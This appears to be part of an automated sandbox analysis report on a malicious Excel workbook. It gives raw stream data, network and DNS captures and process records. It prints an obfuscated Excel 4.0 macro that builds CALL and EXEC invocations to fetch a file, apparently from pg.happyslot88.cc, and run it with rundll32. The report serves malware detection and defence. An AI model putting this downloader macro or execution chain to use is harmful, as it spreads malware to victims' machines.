                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 83229
                                                                                                                                                      General
                                                                                                                                                      Stream Path:Workbook
                                                                                                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                      Stream Size:83229
                                                                                                                                                      Entropy:3.67638531123
                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                      Data ASCII:. . . . . . . . g 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . .
                                                                                                                                                      Data Raw:09 08 10 00 00 06 05 00 67 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                      Macro 4.0 Code

                                                                                                                                                      ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&FORMULA(Doc2!AS110&Doc2!AS111&""2 "",AD15)","=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&FORMULA(Doc2!AT110,AE15)","=FORMULA(Doc2!AV105&Doc2!AV107&Doc2!AV109,AF15)",,,,,,,,,,,,,,,,=AE14(),=before.2.6.28.sheet!AD19(),=AJ19(),,,,,,,,,=before.2.6.28.sheet!AF20(),,,,,,,,,,,,,,,,"=REPLACE(Doc2!AP102&Doc2!AQ102,6,1,before.2.6.28.sheet!AE19)",,,,,,"=REPLACE(Doc2!AT94,6,1,Doc2!AT95)",,"=CALL(AF15,before.2.6.28.sheet!AD21&before.2.6.28.sheet!AD20&before.2.6.28.sheet!AD19&""A"",""JJC""&""CBB"",0,Doc3!A100,""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&Doc2!AT99,0)","=REPLACE(Doc2!AP103,7,7,Doc2!AP101&Doc2!AQ101)",,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&EXEC(before.2.6.28.sheet!AD15&Doc2!AT99&before.2.6.28.sheet!AE15&AJ19)",,,,=AL19(),,=AF17(),"=REPLACE(Doc2!AP104&Doc2!AQ104&Doc2!AR104,7,7,"""")",,=HALT(),,,,,,,=before.2.6.28.sheet!AF14(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                                                                                                                                                      Network Behavior

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      TCP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Feb 22, 2021 19:20:28.945894957 CET49721443192.168.2.3139.162.8.120
                                                                                                                                                      Feb 22, 2021 19:20:29.167375088 CET44349721139.162.8.120192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:29.167481899 CET49721443192.168.2.3139.162.8.120
                                                                                                                                                      Feb 22, 2021 19:20:29.168451071 CET49721443192.168.2.3139.162.8.120
                                                                                                                                                      Feb 22, 2021 19:20:29.389699936 CET44349721139.162.8.120192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:29.392009974 CET44349721139.162.8.120192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:29.392064095 CET44349721139.162.8.120192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:29.392096043 CET44349721139.162.8.120192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:29.392148018 CET49721443192.168.2.3139.162.8.120
                                                                                                                                                      Feb 22, 2021 19:20:29.392211914 CET49721443192.168.2.3139.162.8.120
                                                                                                                                                      Feb 22, 2021 19:20:29.392219067 CET49721443192.168.2.3139.162.8.120
                                                                                                                                                      Feb 22, 2021 19:20:29.406243086 CET49721443192.168.2.3139.162.8.120
                                                                                                                                                      Feb 22, 2021 19:20:29.628897905 CET44349721139.162.8.120192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:29.629467010 CET44349721139.162.8.120192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:29.629607916 CET49721443192.168.2.3139.162.8.120
                                                                                                                                                      Feb 22, 2021 19:20:29.630937099 CET49721443192.168.2.3139.162.8.120
                                                                                                                                                      Feb 22, 2021 19:20:29.852118015 CET44349721139.162.8.120192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:30.522454977 CET44349721139.162.8.120192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:30.522802114 CET49721443192.168.2.3139.162.8.120
                                                                                                                                                      Feb 22, 2021 19:20:30.525335073 CET49721443192.168.2.3139.162.8.120
                                                                                                                                                      Feb 22, 2021 19:20:30.535044909 CET44349721139.162.8.120192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:30.535351992 CET44349721139.162.8.120192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:30.540003061 CET49721443192.168.2.3139.162.8.120
                                                                                                                                                      Feb 22, 2021 19:20:30.540625095 CET49721443192.168.2.3139.162.8.120
                                                                                                                                                      Feb 22, 2021 19:20:30.748271942 CET44349721139.162.8.120192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:30.748473883 CET49721443192.168.2.3139.162.8.120

                                                                                                                                                      UDP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Feb 22, 2021 19:20:13.536171913 CET6493853192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:20:13.589221001 CET53649388.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:13.652007103 CET6015253192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:20:13.720706940 CET53601528.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:14.366910934 CET5754453192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:20:14.417426109 CET53575448.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:15.299793959 CET5598453192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:20:15.351500034 CET53559848.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:16.055807114 CET6418553192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:20:16.104733944 CET53641858.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:16.864917994 CET6511053192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:20:16.916476011 CET53651108.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:19.264467955 CET5836153192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:20:19.313463926 CET53583618.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:24.550055981 CET6349253192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:20:24.599874020 CET53634928.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:25.660494089 CET6083153192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:20:25.710973024 CET53608318.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:26.040143967 CET6010053192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:20:26.113622904 CET53601008.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:26.557635069 CET5319553192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:20:26.632488012 CET53531958.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:27.288362980 CET5014153192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:20:27.345408916 CET53501418.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:27.573331118 CET5319553192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:20:27.633255959 CET53531958.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:28.589118958 CET5319553192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:20:28.658246040 CET53531958.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:28.884668112 CET5302353192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:20:28.943761110 CET53530238.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:29.453006029 CET4956353192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:20:29.504666090 CET53495638.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:30.586302042 CET5319553192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:20:30.643656015 CET53531958.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:30.688621044 CET5135253192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:20:30.740325928 CET53513528.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:31.581621885 CET5934953192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:20:31.630434990 CET53593498.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:32.360450983 CET5708453192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:20:32.409260988 CET53570848.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:33.146677971 CET5882353192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:20:33.203701019 CET53588238.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:34.309154987 CET5756853192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:20:34.357893944 CET53575688.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:34.711848974 CET5319553192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:20:34.769081116 CET53531958.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:35.913816929 CET5054053192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:20:35.962596893 CET53505408.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:37.668611050 CET5436653192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:20:37.718168020 CET53543668.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:38.598248959 CET5303453192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:20:38.648453951 CET53530348.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:47.300442934 CET5776253192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:20:47.351907969 CET53577628.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:20:50.563761950 CET5543553192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:20:50.623769045 CET53554358.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:21:07.490240097 CET5071353192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:21:07.558243036 CET53507138.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:21:08.928632975 CET5613253192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:21:08.980113029 CET53561328.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:21:10.731972933 CET5898753192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:21:10.785418034 CET53589878.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:21:12.184909105 CET5657953192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:21:12.238502026 CET53565798.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:21:17.196134090 CET6063353192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:21:17.257117033 CET53606338.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:21:50.932719946 CET6129253192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:21:50.981904984 CET53612928.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:21:51.519282103 CET6361953192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:21:51.576239109 CET53636198.8.8.8192.168.2.3
                                                                                                                                                      Feb 22, 2021 19:22:14.238630056 CET6493853192.168.2.38.8.8.8
                                                                                                                                                      Feb 22, 2021 19:22:14.291295052 CET53649388.8.8.8192.168.2.3

                                                                                                                                                      DNS Queries

                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                      Feb 22, 2021 19:20:28.884668112 CET192.168.2.38.8.8.80x12d8Standard query (0)pg.happyslot88.ccA (IP address)IN (0x0001)

                                                                                                                                                      DNS Answers

                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                      Feb 22, 2021 19:20:28.943761110 CET8.8.8.8192.168.2.30x12d8No error (0)pg.happyslot88.cc139.162.8.120A (IP address)IN (0x0001)

                                                                                                                                                      HTTPS Packets

                                                                                                                                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                      Feb 22, 2021 19:20:29.392064095 CET139.162.8.120443192.168.2.349721CN=pg.happyslot88.cc CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Mon Feb 01 08:41:15 CET 2021 Wed Oct 07 21:21:40 CEST 2020Sun May 02 09:41:15 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                      CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                                                                                      Code Manipulations

                                                                                                                                                      Statistics

                                                                                                                                                      CPU Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Memory Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                      Behavior

                                                                                                                                                      Click to jump to process

                                                                                                                                                      System Behavior

                                                                                                                                                      General

                                                                                                                                                      Start time:19:20:24
                                                                                                                                                      Start date:22/02/2021
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                      Imagebase:0x1140000
                                                                                                                                                      File size:27110184 bytes
                                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:19:20:30
                                                                                                                                                      Start date:22/02/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:rundll32 ..\rieuro.vnt,DllRegisterServer
                                                                                                                                                      Imagebase:0xf10000
                                                                                                                                                      File size:61952 bytes
                                                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Disassembly

                                                                                                                                                      Code Analysis

                                                                                                                                                      Reset < >